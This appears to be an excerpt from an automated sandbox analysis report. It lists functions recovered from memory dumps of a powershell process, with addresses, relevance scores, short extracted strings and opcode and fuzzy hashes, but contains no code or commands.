                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                          • API String ID: 0-879563280
                                                                                                                                                                                          • Opcode ID: 4e412bb6e06b3eec5daa3a69c0f2a0d6065e34442791c1092efb85dcc6883a9f
                                                                                                                                                                                          • Instruction ID: 538565c389385ce61573815605855d677adb69dc6dbcaab5d0046881780d9408
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e412bb6e06b3eec5daa3a69c0f2a0d6065e34442791c1092efb85dcc6883a9f
                                                                                                                                                                                          • Instruction Fuzzy Hash: D3E13CB1B0420ADFEB698E69841867ABBE1BF85320F1486BAD415CF2D5DF31C845C7E1
                                                                                                                                                                                          Function 070043C8 Relevance: 14.6, Strings: 11, Instructions: 881COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: (fl$(fl$(fl$(fl$(fl$(fl$(fl$(fl$(fl$4'^q$4'^q
                                                                                                                                                                                          • API String ID: 0-2889184274
                                                                                                                                                                                          • Opcode ID: 8db2151190458f343171bdb0dc2bae9cbcb2a0e08190f95605a90b6ca91142a8
                                                                                                                                                                                          • Instruction ID: 405ddb4a001aa75ef89d20542887e45cb9449fa5e9d3566a4433592d9eca2a74
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8db2151190458f343171bdb0dc2bae9cbcb2a0e08190f95605a90b6ca91142a8
                                                                                                                                                                                          • Instruction Fuzzy Hash: D9825F74B00244DFD764CBA8C444F9EBBF2AB86314F25C269E9159B396CB72EC418F91
                                                                                                                                                                                          Function 07001090 Relevance: 13.1, Strings: 10, Instructions: 615COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: (fl$(fl$(fl$(fl$4'^q$4'^q$4'^q$4'^q$$^q$$^q
                                                                                                                                                                                          • API String ID: 0-2341724748
                                                                                                                                                                                          • Opcode ID: a1c051cdf72b02d90ed3a0705fbb03ac6cf02966382863d69acefb6149e35e5b
                                                                                                                                                                                          • Instruction ID: 7c3e20d43f857c5b501492c58763ce75562c8ce936c59165c24ca16598b8f3b6
                                                                                                                                                                                          • Opcode Fuzzy Hash: a1c051cdf72b02d90ed3a0705fbb03ac6cf02966382863d69acefb6149e35e5b
                                                                                                                                                                                          • Instruction Fuzzy Hash: AE327CB4B01208DFE754DB98C445B6EBBF2BF85314F148169E9059F395CB72EC428B92
                                                                                                                                                                                          Function 0282ABB0 Relevance: 10.5, Strings: 8, Instructions: 516COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2088652525.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_2820000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: 8NCm$Hbq$h]Cm$h]Cm$h]Cm$$^q$$^q$ICm
                                                                                                                                                                                          • API String ID: 0-4127862837
                                                                                                                                                                                          • Opcode ID: 3d5782617fb1d937fec242d6e2bc63fc5cfd163ed28723c0dd3a36e43adbc54d
                                                                                                                                                                                          • Instruction ID: 85cc54f108cd686dcce319dfdb4f65dc1818f50b8ebaedcdd2be657fdb3da1b8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d5782617fb1d937fec242d6e2bc63fc5cfd163ed28723c0dd3a36e43adbc54d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F224238B011289FCB29DB24D858BAEB7B6AF89304F1544A9D409EB365CF35DD85CF81
                                                                                                                                                                                          Function 070043C5 Relevance: 8.3, Strings: 6, Instructions: 774COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: (fl$(fl$(fl$(fl$(fl$4'^q
                                                                                                                                                                                          • API String ID: 0-1399496103
                                                                                                                                                                                          • Opcode ID: acd99b699ff359b1d832be01543aaecc85d4da97238e10ea9205d6858911e2fe
                                                                                                                                                                                          • Instruction ID: 1fbb516d52c2ee21ab758928eb4f1a615c9b25cf2c7cf6c1f7f4c315772e842c
                                                                                                                                                                                          • Opcode Fuzzy Hash: acd99b699ff359b1d832be01543aaecc85d4da97238e10ea9205d6858911e2fe
                                                                                                                                                                                          • Instruction Fuzzy Hash: E8625EB4A00245DFE764CB98C444F99BBF2BB86314F25C269E9159B392CB72EC41CF91
                                                                                                                                                                                          Function 07005EB8 Relevance: 7.9, Strings: 6, Instructions: 426COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: (fl$(fl$(fl$(fl$4'^q$4'^q
                                                                                                                                                                                          • API String ID: 0-2491101776
                                                                                                                                                                                          • Opcode ID: fb073ba55023bbda126e0f9677a2c22d9023b1b06cfd8fd67185ea227db2db1a
                                                                                                                                                                                          • Instruction ID: 1982489c26e808cacdbf41f13ef501087950360504b365bcfce630c351a53349
                                                                                                                                                                                          • Opcode Fuzzy Hash: fb073ba55023bbda126e0f9677a2c22d9023b1b06cfd8fd67185ea227db2db1a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 23E1C2B0B00205DFE7549BA9C851BAEBBE3AF85310F148569D405AB396CF73DC528BD2
                                                                                                                                                                                          Function 07006A90 Relevance: 7.8, Strings: 6, Instructions: 339COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                                                                                                                                                          • API String ID: 0-2822668367
                                                                                                                                                                                          • Opcode ID: 4760eaadd60702bf106e56f2b9a1418221c2a65dbc08661cc72db2e2c1c46594
                                                                                                                                                                                          • Instruction ID: 6c7ef47c47b7efb415b2a69f38f61820511cea4c3ea938eaf4a535d8b420a681
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4760eaadd60702bf106e56f2b9a1418221c2a65dbc08661cc72db2e2c1c46594
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5DD1BD74A00208DFD714DBA8C845B9EBBE3AF88314F25C569D5056F396CF72EC868B91
                                                                                                                                                                                          Function 07000388 Relevance: 7.7, Strings: 6, Instructions: 242COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: tP^q$tP^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                          • API String ID: 0-2782953261
                                                                                                                                                                                          • Opcode ID: f07fa003a477747a6cabc263a1af33b862fba9812b36ecade26722a5f2bfe228
                                                                                                                                                                                          • Instruction ID: 025453e1c06c1061bc8634ea1b695f837a2db4b87c71b7e6da58f417a1aa9722
                                                                                                                                                                                          • Opcode Fuzzy Hash: f07fa003a477747a6cabc263a1af33b862fba9812b36ecade26722a5f2bfe228
                                                                                                                                                                                          • Instruction Fuzzy Hash: DA719AB1F002159FEB248A6988007AFBBE6AF85320F14C67AD919DF381DE71D945C3E1
                                                                                                                                                                                          Function 070045D8 Relevance: 6.9, Strings: 5, Instructions: 643COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: (fl$(fl$(fl$(fl$4'^q
                                                                                                                                                                                          • API String ID: 0-3171166521
                                                                                                                                                                                          • Opcode ID: 8e521ff714005cca7f7a979c2b9ba0e30b5669e3bd35e09f144c32a68a6cad52
                                                                                                                                                                                          • Instruction ID: 2902b1a25dee1c86cb06ab494e454bde28c3ade498d66f4088037c7af79c0291
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e521ff714005cca7f7a979c2b9ba0e30b5669e3bd35e09f144c32a68a6cad52
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F525FB4A00245DFE760CB98C445F99B7F2BB86314F25C2A9E9159B392CB72EC41CF85
                                                                                                                                                                                          Function 07004DBF Relevance: 5.6, Strings: 4, Instructions: 590COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: (fl$(fl$(fl$4'^q
                                                                                                                                                                                          • API String ID: 0-2513682006
                                                                                                                                                                                          • Opcode ID: b9fc59b68a00429335e16703e3446e982883d59b74c3b84f99b49306f6cdc455
                                                                                                                                                                                          • Instruction ID: c10e3f60adac8b4d944922a1c13af9ba2bd6b68169715519868c0e080c6bf879
                                                                                                                                                                                          • Opcode Fuzzy Hash: b9fc59b68a00429335e16703e3446e982883d59b74c3b84f99b49306f6cdc455
                                                                                                                                                                                          • Instruction Fuzzy Hash: DD426F74A00245DFE764CB98C441F99BBF2BB86314F25C2A9E9159B392CB72EC41CF81
                                                                                                                                                                                          Function 0700A370 Relevance: 5.6, Strings: 4, Instructions: 582COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                                                                                                          • API String ID: 0-1420252700
                                                                                                                                                                                          • Opcode ID: 809166dfa46e53b4ae9976b4fbcc1371d93da34095937ec040a4ca69412b5720
                                                                                                                                                                                          • Instruction ID: f778a9f55d56d179179d42113888144c96707d7262f6d4d69bbd99a60e5875ca
                                                                                                                                                                                          • Opcode Fuzzy Hash: 809166dfa46e53b4ae9976b4fbcc1371d93da34095937ec040a4ca69412b5720
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C125CF5B003159FDB549AB89805B6ABBE2AFC1221F14C17AD509CB2D2DF31D842C7E2
                                                                                                                                                                                          Function 070079AB Relevance: 5.4, Strings: 4, Instructions: 395COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: (fl$(fl$4'^q$4'^q
                                                                                                                                                                                          • API String ID: 0-1388450209
                                                                                                                                                                                          • Opcode ID: 1cf9da2abe86c51369b1fbd4c082fdd13e77518cde4cba18f5f0b7aae966f8d2
                                                                                                                                                                                          • Instruction ID: 7be6770a70e9db17fdd18ea5d45e25e177abb598ea791099ae50dd30f91bda17
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1cf9da2abe86c51369b1fbd4c082fdd13e77518cde4cba18f5f0b7aae966f8d2
                                                                                                                                                                                          • Instruction Fuzzy Hash: C9F18170A002149FDB54DBA8C951FAABBF3BF84300F1486A9D5096F395CF75ED818B92
                                                                                                                                                                                          Function 07001070 Relevance: 4.3, Strings: 3, Instructions: 547COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: (fl$(fl$4'^q
                                                                                                                                                                                          • API String ID: 0-4127509329
                                                                                                                                                                                          • Opcode ID: 097b09f7679b0c5716344f51bd67929526186a1ed5a6a0d80b315c4faadb6a6b
                                                                                                                                                                                          • Instruction ID: b316c834b29230f2433f4f14e5b213f124b4b889a5397dc95e1bbfcf3b6088ef
                                                                                                                                                                                          • Opcode Fuzzy Hash: 097b09f7679b0c5716344f51bd67929526186a1ed5a6a0d80b315c4faadb6a6b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 93226CB4A01209DFE754CB98C445FADBBF2BF85324F148259E9059B396CB72EC42CB91
                                                                                                                                                                                          Function 070017CD Relevance: 4.3, Strings: 3, Instructions: 532COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: (fl$(fl$4'^q
                                                                                                                                                                                          • API String ID: 0-4127509329
                                                                                                                                                                                          • Opcode ID: a71472f2dd18d528488f69843cc9dd17a2f25b18d8caa7dc8da133babd6b3b38
                                                                                                                                                                                          • Instruction ID: 6aa5bf63879654f720404669a9028aa489019e17308545e349a7d96962f35ba7
                                                                                                                                                                                          • Opcode Fuzzy Hash: a71472f2dd18d528488f69843cc9dd17a2f25b18d8caa7dc8da133babd6b3b38
                                                                                                                                                                                          • Instruction Fuzzy Hash: 21226AB4A01208DFE754DB98C445FADBBF2BF85314F148169E9059F396CB72EC428B92
                                                                                                                                                                                          Function 07006A8D Relevance: 4.0, Strings: 3, Instructions: 259COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: 4'^q$4'^q$4'^q
                                                                                                                                                                                          • API String ID: 0-1196845430
                                                                                                                                                                                          • Opcode ID: 45e667b223992211e931d5112c7eef63e28b5f11e80599d703369763730f93b9
                                                                                                                                                                                          • Instruction ID: b6377048217ba7ed1bef89491d2b39e757945e0cd5f1bdb897644eaf81ab1a94
                                                                                                                                                                                          • Opcode Fuzzy Hash: 45e667b223992211e931d5112c7eef63e28b5f11e80599d703369763730f93b9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2CA1BFB4A00204DFDB14DB98C541B9EBBF3BF88314F15C219D9052F396CB72E8928B91
                                                                                                                                                                                          Function 07000BA8 Relevance: 3.8, Strings: 3, Instructions: 94COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: $^q$$^q$$^q
                                                                                                                                                                                          • API String ID: 0-831282457
                                                                                                                                                                                          • Opcode ID: 0d7b6e62ed631f34ca6bc73cbca13fd519861e5350bb30d70bb8c80972947024
                                                                                                                                                                                          • Instruction ID: 6fdc80098a52107089b5be426127f8e7fb00ec6a16ae1a42b530aa9da13ad634
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d7b6e62ed631f34ca6bc73cbca13fd519861e5350bb30d70bb8c80972947024
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E2138B571430A5BF7741A7A9840F2BB6DA5BC1724F24893AA509CF3C6DD36C84183E1
                                                                                                                                                                                          Function 070060F8 Relevance: 2.7, Strings: 2, Instructions: 240COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: (fl$(fl
                                                                                                                                                                                          • API String ID: 0-2979295544
                                                                                                                                                                                          • Opcode ID: 1d49b143aea8690bd25e652ab2306cc54495e15cbbc29ca2c23e8c2e6248d63b
                                                                                                                                                                                          • Instruction ID: bd4cd1246e0dc9d026673d5ca2267e162996fdc1d5e9ebb854ea9daef32e2e5b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d49b143aea8690bd25e652ab2306cc54495e15cbbc29ca2c23e8c2e6248d63b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C917CB4A00205DFE714CBA9C551B9EBBF3BB89310F148169E5056B395CB73EC52CB92
                                                                                                                                                                                          Function 0282ECE4 Relevance: 2.7, Strings: 2, Instructions: 181COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2088652525.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_2820000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: \VCm$\VCm
                                                                                                                                                                                          • API String ID: 0-357778706
                                                                                                                                                                                          • Opcode ID: 55d3c86dbb1efd2329f5f3317109741724cf097d44fb266aaa4e917fea21809a
                                                                                                                                                                                          • Instruction ID: ece9fdfd0e0e0c9cb06179fd88baf65109483b2203ab50e3f3ac33b30645376a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 55d3c86dbb1efd2329f5f3317109741724cf097d44fb266aaa4e917fea21809a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 89714E78D002299FDB10CFA9D8857DEBBF2EF48314F148129E419E7254DB74A889CF95
                                                                                                                                                                                          Function 0282ECF0 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2088652525.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_2820000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: \VCm$\VCm
                                                                                                                                                                                          • API String ID: 0-357778706
                                                                                                                                                                                          • Opcode ID: 748ebb3d3b8148c4d24009f401206c0244058a9336cd269edad9085cf80718b0
                                                                                                                                                                                          • Instruction ID: 57a46714c2d3dfa9cbfd967b1809ae617a1992cd08aa83cd63496db78e7e4db1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 748ebb3d3b8148c4d24009f401206c0244058a9336cd269edad9085cf80718b0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E715F78E002198FDF14CFA9C88579DBBF2EF48314F148529E419E7254DB74A885CF95
                                                                                                                                                                                          Function 07000668 Relevance: 2.7, Strings: 2, Instructions: 178COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: tP^q$tP^q
                                                                                                                                                                                          • API String ID: 0-309238000
                                                                                                                                                                                          • Opcode ID: f9f6fd7ea8d84fc2049409504ceee1ad3cfdcc35b10d9861735a5114b51bd9f6
                                                                                                                                                                                          • Instruction ID: 415a425aac2f222d216c9cd2696abc1bad6b672e5061e038dc8847227f4ba527
                                                                                                                                                                                          • Opcode Fuzzy Hash: f9f6fd7ea8d84fc2049409504ceee1ad3cfdcc35b10d9861735a5114b51bd9f6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D51ADB6B043558FD7548A699804B7AFFE2AFC1230F18C1BBD509CB291CA36D845C7E1
                                                                                                                                                                                          Function 070030F8 Relevance: 2.6, Strings: 2, Instructions: 139COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: tP^q$tP^q
                                                                                                                                                                                          • API String ID: 0-309238000
                                                                                                                                                                                          • Opcode ID: ca5fd67a6ea9e9bd00b9fdcd10f4fb9026e3362fa4dc14f30af62459c39e02c7
                                                                                                                                                                                          • Instruction ID: 6d8f7eb97b4d07e7fac0592d03eb882da0fc950d6aa2a4561ce572b5fee28329
                                                                                                                                                                                          • Opcode Fuzzy Hash: ca5fd67a6ea9e9bd00b9fdcd10f4fb9026e3362fa4dc14f30af62459c39e02c7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3741F370A09389AFD7128B64C814B5AFFB2AF4A720F18C59AE4048F3D2CA319C45C3E1
                                                                                                                                                                                          Function 0282B868 Relevance: 2.6, Strings: 2, Instructions: 92COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2088652525.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_2820000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: h]Cm$ICm
                                                                                                                                                                                          • API String ID: 0-1475890167
                                                                                                                                                                                          • Opcode ID: 428b8e409a1aa4307d19b301b1b86b49d053ae5fd738b12b2b763d0f7d1efb0b
                                                                                                                                                                                          • Instruction ID: a435c4ce381d3f169934d6ba64f3434272750549e64690df349ac5d88f142e6b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 428b8e409a1aa4307d19b301b1b86b49d053ae5fd738b12b2b763d0f7d1efb0b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 33313038A051288FCF25DB64C854BEEB7B2BF49348F1140E9D509AB355CB359E85CF81
                                                                                                                                                                                          Function 07000B8C Relevance: 2.6, Strings: 2, Instructions: 74COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2118275633.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7000000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: $^q$$^q
                                                                                                                                                                                          • API String ID: 0-355816377
                                                                                                                                                                                          • Opcode ID: 5000a3efb1422931b51f82a4e6853b3c5ff3bf7e3c100e39d9ec35180ca5b1c9
                                                                                                                                                                                          • Instruction ID: fe6a9b55305af1b61876b922bc70499e7ccac3e2902eb4fb10497481efd84711
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5000a3efb1422931b51f82a4e6853b3c5ff3bf7e3c100e39d9ec35180ca5b1c9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D213A753083896BF7700A798C41FA67FE55B82724F288676A5488F2C7DA299484C3F1
                                                                                                                                                                                          Function 0282E69D Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.2088652525.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_2820000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: \VCm
                                                                                                                                                                                          • API String ID: 0-553204775
                                                                                                                                                                                          • Opcode ID: 881072f530a47c2b190561d708a9c5fec8ee483d853c7c7186a006c5e64e5af5
                                                                                                                                                                                          • Instruction ID: 3d91264829f26c2c016fd5fdbbdc3bcb72ee2b26d2a694bf0941b1bc4dbe1c31
                                                                                                                                                                                          • Opcode Fuzzy Hash: 881072f530a47c2b190561d708a9c5fec8ee483d853c7c7186a006c5e64e5af5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6DB14D78E00229CFDB10CFA9C8857DDBBF1AF48314F148129D859E7294EB74A889CF95
                                                                                                                                                                                          Function 07000647 Relevance: 1.3, Strings: 1, Instructions: 83COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
